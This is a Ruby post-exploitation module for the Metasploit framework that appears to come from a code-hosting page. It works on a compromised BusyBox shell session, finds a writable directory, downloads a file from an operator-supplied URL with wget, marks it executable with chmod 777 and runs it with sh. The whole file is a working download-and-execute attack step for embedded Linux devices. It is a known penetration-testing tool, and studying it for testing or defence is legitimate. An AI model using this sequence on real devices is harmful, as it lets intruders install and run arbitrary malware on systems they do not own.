55 lines
1.6 KiB
Ruby
55 lines
1.6 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
include Msf::Post::File
|
|
include Msf::Post::Linux::BusyBox
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'BusyBox Download and Execute',
|
|
'Description' => %q{
|
|
This module will be applied on a session connected to a BusyBox shell. It will use wget to
|
|
download and execute a file from the device running BusyBox.
|
|
},
|
|
'Author' => 'Javier Vicente Vallejo',
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => ['linux'],
|
|
'SessionTypes' => ['shell']
|
|
)
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('URL', [true, 'Full URL of file to download'])
|
|
], self.class)
|
|
end
|
|
|
|
def run
|
|
print_status('Searching a writable directory...')
|
|
writable_directory = busy_box_writable_dir
|
|
if writable_directory
|
|
print_status('Writable directory found, downloading file...')
|
|
random_file_path = "#{writable_directory}#{Rex::Text.rand_text_alpha(16)}"
|
|
cmd_exec("wget -O #{random_file_path} #{datastore['URL']}")
|
|
Rex::sleep(0.1)
|
|
|
|
if busy_box_file_exist?(random_file_path)
|
|
print_good('File downloaded, executing...')
|
|
cmd_exec("chmod 777 #{random_file_path}")
|
|
Rex::sleep(0.1)
|
|
res = cmd_exec("sh #{random_file_path}")
|
|
vprint_status(res)
|
|
else
|
|
print_error('Unable to download file')
|
|
end
|
|
else
|
|
print_error('Writable directory not found')
|
|
end
|
|
end
|
|
end
|